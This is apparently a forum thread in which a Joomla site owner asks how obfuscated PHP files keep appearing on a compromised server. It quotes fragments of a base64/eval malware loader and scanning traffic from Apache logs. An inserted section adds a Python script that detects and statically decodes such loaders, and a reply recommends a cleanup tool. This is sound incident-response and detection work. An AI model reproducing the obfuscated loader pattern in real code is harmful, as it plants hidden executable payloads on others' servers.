PHP file containing base64_decode shows up on server

There is a hole somewhere on my server and I need some help plugging it. A PHP file containing base64-encoded code keeps showing up on my Joomla site.

At first I got blacklisted (kelihos was listed as the reason) and found I had many PHP files with random but human-friendly names (login.php, file.php, alias75.php...) in the Joomla directories. All the files had the main part of the script after a base64_decode function. Here is a sample from the listing of such files:

-rw-r--r-- 1 www-data www-data 155232 Dec 24 18:51 file.php

Note the date and time. The night before Christmas. It is always the same - the file showed up at 6 this morning, dated December 24. Could this be a clue? Here is a snippet of the actual code:

<?php
function jqgwuawwjs($rlkr, $fikixpq){$wynuczq = ''; for($i=0; $i < strlen($rlkr); $i++){$wynuczq .= isset($fikixpq[$rlkr[$i]]) ? $fikixpq[$rlkr[$i]] : $rlkr[$i];}
$jeb="base64_decode";return $jeb($wynuczq);}
$ldo = 'dGCoZSRV5id3buS9XQR9iuMT59Xg1zcSKz0Ok0OUZYcOipECsx'.
'aDIGRDiuS9XQR9X9Xg1PUOk0OUZYcOipECsxaDIYFHiuSH5YE2sGCTICR6ZY2Cb90ayxqmxq7V5iWv'.

This continues for the next 1900 lines and ends with:

;
$zmdjyoxo = Array('1'=>'I', '0'=>'w', '3'=>'o', '2'=>'1', '5'=>'Z', '4'=>'q', '7'=>'B', '6'=>'0', '9'=>'y', '8'=>'6', 'A'=>'K', 'C'=>'l', 'B'=>'i', 'E'=>'N', 'D'=>'n', 'G'=>'G', 'F'=>'F', 'I'=>'b', 'H'=>'4', 'K'=>'T', 'J'=>'8', 'M'=>'x', 'L'=>'L', 'O'=>'p', 'N'=>'P', 'Q'=>'m', 'P'=>'D', 'S'=>'V', 'R'=>'9', 'U'=>'A', 'T'=>'v', 'W'=>'R', 'V'=>'z', 'Y'=>'W', 'X'=>'c', 'Z'=>'a', 'a'=>'g', 'c'=>'5', 'b'=>'J', 'e'=>'t', 'd'=>'Q', 'g'=>'s', 'f'=>'j', 'i'=>'X', 'h'=>'U', 'k'=>'O', 'j'=>'r', 'm'=>'7', 'l'=>'e', 'o'=>'u', 'n'=>'h', 'q'=>'k', 'p'=>'3', 's'=>'d', 'r'=>'Y', 'u'=>'2', 't'=>'S', 'w'=>'H', 'v'=>'f', 'y'=>'M', 'x'=>'C', 'z'=>'E');
eval(jqgwuawwjs($ldo, $zmdjyoxo));?>

When you change eval to print, this is the result (the code is too big for the message body - here is a link to pastebin):

http://pastebin.com/xcY3wQs6

I removed all these files from the server, changed the root password, the MySQL password and the Joomla password, and activated two-factor authentication for the Joomla administrator.

I noticed strange behaviour a month ago, but before I could investigate the problem (which is possibly related) my provider, Host9, had a catastrophic failure. That left me without the website and mail server for 24 - Dec. 15 to Jan. 16 (!). Since then I have had a cron job looking for these PHP files. Of course, deleting them only solves half the problem. The question is: how do these files keep popping up?

I have a VPS running:

Ubuntu Server Linux 3.13.0-63-generic on x86_64

Apache/2.4.7

PHP 5.5.9

Joomla 3.4.8

The file appeared after 6:00 in the morning, so I am including the apache2 access.log from around that time:

61.135.190.71 - - [27/Jan/2016:22:56:31 +0000] "GET / HTTP/1.0" 200 430 "http://www.baidu.com/s?wd=www" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)"
208.52.154.243 - - [28/Jan/2016:01:23:44 +0000] "GET /dbadmin/scripts/setup.php HTTP/1.0" 404 458 "-" "-"
::1 - - [28/Jan/2016:02:56:54 +0000] "OPTIONS * HTTP/1.0" 200 110 "-" "Apache/2.4.7 (Ubuntu) (internal dummy connection)"
::1 - - [28/Jan/2016:02:56:55 +0000] "OPTIONS * HTTP/1.0" 200 110 "-" "Apache/2.4.7 (Ubuntu) (internal dummy connection)"
::1 - - [28/Jan/2016:02:56:56 +0000] "OPTIONS * HTTP/1.0" 200 110 "-" "Apache/2.4.7 (Ubuntu) (internal dummy connection)"
::1 - - [28/Jan/2016:06:43:36 +0000] "OPTIONS * HTTP/1.0" 200 110 "-" "Apache/2.4.7 (Ubuntu) (internal dummy connection)"
::1 - - [28/Jan/2016:06:56:03 +0000] "OPTIONS * HTTP/1.0" 200 110 "-" "Apache/2.4.7 (Ubuntu) (internal dummy connection)"
::1 - - [28/Jan/2016:07:11:58 +0000] "OPTIONS * HTTP/1.0" 200 110 "-" "Apache/2.4.7 (Ubuntu) (internal dummy connection)"
::1 - - [28/Jan/2016:07:12:20 +0000] "OPTIONS * HTTP/1.0" 200 110 "-" "Apache/2.4.7 (Ubuntu) (internal dummy connection)"
::1 - - [28/Jan/2016:07:12:21 +0000] "OPTIONS * HTTP/1.0" 200 110 "-" "Apache/2.4.7 (Ubuntu) (internal dummy connection)"
::1 - - [28/Jan/2016:07:12:30 +0000] "OPTIONS * HTTP/1.0" 200 110 "-" "Apache/2.4.7 (Ubuntu) (internal dummy connection)"
::1 - - [28/Jan/2016:07:12:34 +0000] "OPTIONS * HTTP/1.0" 200 110 "-" "Apache/2.4.7 (Ubuntu) (internal dummy connection)"
::1 - - [28/Jan/2016:07:13:23 +0000] "OPTIONS * HTTP/1.0" 200 110 "-" "Apache/2.4.7 (Ubuntu) (internal dummy connection)"
::1 - - [28/Jan/2016:07:13:24 +0000] "OPTIONS * HTTP/1.0" 200 110 "-" "Apache/2.4.7 (Ubuntu) (internal dummy connection)"
::1 - - [28/Jan/2016:07:13:26 +0000] "OPTIONS * HTTP/1.0" 200 110 "-" "Apache/2.4.7 (Ubuntu) (internal dummy connection)"
::1 - - [28/Jan/2016:07:26:30 +0000] "OPTIONS * HTTP/1.0" 200 110 "-" "Apache/2.4.7 (Ubuntu) (internal dummy connection)"
::1 - - [28/Jan/2016:07:26:31 +0000] "OPTIONS * HTTP/1.0" 200 110 "-" "Apache/2.4.7 (Ubuntu) (internal dummy connection)"
::1 - - [28/Jan/2016:07:26:32 +0000] "OPTIONS * HTTP/1.0" 200 110 "-" "Apache/2.4.7 (Ubuntu) (internal dummy connection)"
::1 - - [28/Jan/2016:07:29:28 +0000] "OPTIONS * HTTP/1.0" 200 110 "-" "Apache/2.4.7 (Ubuntu) (internal dummy connection)"
78.155.39.214 - - [28/Jan/2016:07:47:02 +0000] "GET /phpmyadmin/ HTTP/1.1" 200 3570 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:43.0) Gecko/20100101 Firefox/43.0"
78.155.39.214 - - [28/Jan/2016:07:47:03 +0000] "GET /phpmyadmin/js/messages.php?lang=en&db=&token=79eab716479466d5c44116323db94bb0 HTTP/1.1" 200 17157 "http://207.210.201.88/phpmyadmin/" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:43.0) Gecko/20100101 Firefox/43.0"
78.155.39.214 - - [28/Jan/2016:07:47:03 +0000] "GET /phpmyadmin/phpmyadmin.css.php?server=1&token=79eab716479466d5c44116323db94bb0&nocache=4147360344ltr HTTP/1.1" 200 17556 "http://my.ip.add.ress/phpmyadmin/" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:43.0) Gecko/20100101 Firefox/43.0"
::1 - - [28/Jan/2016:08:03:53 +0000] "OPTIONS * HTTP/1.0" 200 110 "-" "Apache/2.4.7 (Ubuntu) (internal dummy connection)"
::1 - - [28/Jan/2016:08:03:55 +0000] "OPTIONS * HTTP/1.0" 200 110 "-" "Apache/2.4.7 (Ubuntu) (internal dummy connection)"
::1 - - [28/Jan/2016:08:03:57 +0000] "OPTIONS * HTTP/1.0" 200 110 "-" "Apache/2.4.7 (Ubuntu) (internal dummy connection)"
::1 - - [28/Jan/2016:08:04:01 +0000] "OPTIONS * HTTP/1.0" 200 110 "-" "Apache/2.4.7 (Ubuntu) (internal dummy connection)"
::1 - - [28/Jan/2016:08:04:17 +0000] "OPTIONS * HTTP/1.0" 200 110 "-" "Apache/2.4.7 (Ubuntu) (internal dummy connection)"
::1 - - [28/Jan/2016:08:04:18 +0000] "OPTIONS * HTTP/1.0" 200 110 "-" "Apache/2.4.7 (Ubuntu) (internal dummy connection)"

apache2 error.log

[Mon Jan 25 03:30:13.688765 2016] [:error] [pid 25830] [client 95.213.177.123:41264] script '/var/www/azenv.php' not found or unable to stat, referer: https://proxyradar.com/
[Mon Jan 25 03:49:23.091859 2016] [:error] [pid 4517] [client 208.52.154.243:37227] script '/var/www/moadmin.php' not found or unable to stat
[Mon Jan 25 07:40:45.016456 2016] [:error] [pid 19847] [client 95.213.177.124:38892] script '/var/www/azenv.php' not found or unable to stat, referer: https://proxyradar.com/
[Mon Jan 25 23:50:34.056409 2016] [:error] [pid 2434] [client 185.25.151.159:34885] script '/var/www/testproxy.php' not found or unable to stat
[Tue Jan 26 06:47:48.641496 2016] [:error] [pid 6043] [client 95.213.177.122:42690] script '/var/www/azenv.php' not found or unable to stat, referer: https://proxyradar.com/
[Tue Jan 26 10:58:48.569545 2016] [:error] [pid 14076] [client 95.213.177.123:32251] script '/var/www/azenv.php' not found or unable to stat, referer: https://proxyradar.com/
[Tue Jan 26 15:06:42.084295 2016] [core:error] [pid 25454] [client 169.229.3.91:42376] AH00135: Invalid method in request c''xfdF'x9c'xd8'x02'xb9N'xfa'x8d'xc6J('x9c'xb0'x04'xa3%
[Thu Jan 28 08:01:43.830310 2016] [mpm_prefork:notice] [pid 3932] AH00169: caught SIGTERM, shutting down
[Thu Jan 28 08:01:44.884060 2016] [mpm_prefork:notice] [pid 26468] AH00163: Apache/2.4.7 (Ubuntu) configured -- resuming normal operations
[Thu Jan 28 08:01:44.884678 2016] [core:notice] [pid 26468] AH00094: Command line: '/usr/sbin/apache2'
[Thu Jan 28 08:21:31.499215 2016] [:error] [pid 26475] [client 78.155.39.214:50308] script '/var/www/phpmyadmin.css.php' not found or unable to stat
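A defender-side triage script for the loader shape quoted in the question (an added example, not code from the original post, from Joomla or from any tool named here; the function names `scan_php_tree`, `extract_payload`, `build_sample_loader` and `triage_demo`, the `components/alias75.php` path and the harmless payload are all constructed for the demo). It does the two things the question is really asking for: it hunts a web root for PHP files that combine `eval(` of a function result, the literal `base64_decode` and the string-indirection trick `$jeb="base64_decode"`, and it statically reverses the loader's two stages (character substitution table, then base64) so the payload can be read without ever being executed, which is the safe equivalent of changing `eval` to `print`. The substitution table in the constructed sample is a plain shift over the base64 alphabet, whereas the real sample used an arbitrary permutation; the decoder does not care which, because it reads the table out of the file.

```python
"""Triage helper for eval/base64_decode PHP loaders (added example, not from the post)."""
import base64
import re
import string
import tempfile
from pathlib import Path

# Indicators taken from the loader quoted in the question: eval() applied to the
# result of a function call, the literal "base64_decode", and the indirection
# trick `$jeb = "base64_decode"; $jeb(...)` that hides the call from naive greps.
INDICATORS = {
    "eval_of_call": re.compile(r"\beval\s*\(\s*\$?\w+\s*\("),
    "base64_decode": re.compile(r"base64_decode"),
    "indirect_call": re.compile(r"\$\w+\s*=\s*[\"']base64_decode[\"']"),
}
# $var = 'chunk'.\n'chunk'...;  (the concatenated blob) and Array('k'=>'v', ...) (the map)
BLOB_RE = re.compile(r"\$\w+\s*=\s*((?:'[^']*'\s*\.?\s*)+);")
MAP_RE = re.compile(r"Array\s*\((.*?)\)\s*;", re.S)
PAIR_RE = re.compile(r"'(.)'\s*=>\s*'(.)'")


def scan_php_tree(root, min_hits=2):
    """Return {path: [indicator names]} for .php files under root hitting >= min_hits indicators."""
    found = {}
    for path in sorted(Path(root).rglob("*.php")):
        try:
            text = path.read_text(errors="replace")
        except OSError:
            continue
        names = [name for name, rx in INDICATORS.items() if rx.search(text)]
        if len(names) >= min_hits:
            found[str(path)] = names
    return found


def extract_payload(php_source):
    """Statically decode the loader's payload (bytes), or None if the file has another shape."""
    blobs = [m.group(1) for m in BLOB_RE.finditer(php_source)]
    table_match = MAP_RE.search(php_source)
    if not blobs or not table_match:
        return None
    # The decoder function itself contains `$x = '';`, so take the longest blob, not the first.
    encoded = "".join(re.findall(r"'([^']*)'", max(blobs, key=len)))
    table = dict(PAIR_RE.findall(table_match.group(1)))
    # Same logic as jqgwuawwjs(): map each char; unmapped chars (e.g. '=') pass through.
    substituted = "".join(table.get(ch, ch) for ch in encoded)
    try:
        return base64.b64decode(substituted, validate=True)
    except ValueError:
        return None


def build_sample_loader(payload, shift=3):
    """Constructed sample in the same shape as the quoted loader, wrapping a harmless payload.

    The table is a shift over the base64 alphabet (the real sample used an arbitrary
    permutation); keys are the obfuscated characters, values the real base64 characters.
    """
    alphabet = string.ascii_uppercase + string.ascii_lowercase + string.digits + "+/"
    table = {alphabet[(i + shift) % 64]: alphabet[i] for i in range(64)}
    inverse = {real: obf for obf, real in table.items()}
    b64 = base64.b64encode(payload).decode()
    encoded = "".join(inverse.get(ch, ch) for ch in b64)  # '=' padding passes through
    chunks = [encoded[i:i + 60] for i in range(0, len(encoded), 60)]
    blob = ".\n".join(f"'{chunk}'" for chunk in chunks)
    pairs = ", ".join(f"'{obf}'=>'{real}'" for obf, real in table.items())
    return (
        "<?php\n"
        "function f($s, $t){$o = ''; for($i=0; $i < strlen($s); $i++){"
        "$o .= isset($t[$s[$i]]) ? $t[$s[$i]] : $s[$i];}\n"
        '$d="base64_decode"; return $d($o);}\n'
        f"$blob = {blob};\n"
        f"$map = Array({pairs});\n"
        "eval(f($blob, $map));?>\n"
    )


def triage_demo():
    """Drop the constructed sample next to a clean file, scan, and decode what was flagged."""
    payload = b"<?php echo 'harmless constructed payload'; ?>"
    with tempfile.TemporaryDirectory() as root:
        site = Path(root) / "components"  # constructed path, not the real site layout
        site.mkdir()
        (site / "alias75.php").write_text(build_sample_loader(payload))
        (site / "index.php").write_text("<?php echo 'clean file'; ?>\n")
        hits = scan_php_tree(root)
        decoded = {Path(p).name: extract_payload(Path(p).read_text()) for p in hits}
    flagged = {Path(p).name: names for p, names in hits.items()}
    return flagged, decoded, payload


if __name__ == "__main__":
    flagged, decoded, _ = triage_demo()
    for name, names in flagged.items():
        print(f"{name}: indicators {names}")
        print(f"  payload: {decoded[name]!r}")
```

Pointed at a real web root, `scan_php_tree('/var/www')` is a reasonable body for the cron job the question mentions: it lists candidates together with the indicators they hit, and `extract_payload()` on each candidate shows what would have been eval'd. Files that hit only one indicator are not reported by default, since legitimate code calls `base64_decode` all the time; lower `min_hits` if you want those too. Decoding tells you what the file does, but not how it got there; for that the file's mtime against the access log (and the Joomla administrator and FTP/SSH logins around the same minute) is the thing to correlate.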

The code looks like a malware script, and it has been encoded to protect it. I suggest you remove it with a program.

Try Narnia Guardian, http://github.com/Pilskalns/Narnia-Guardian

Try removing these encoded code segments from all files with the resource above. It is easy to set up and easy to use. You just need to be patient.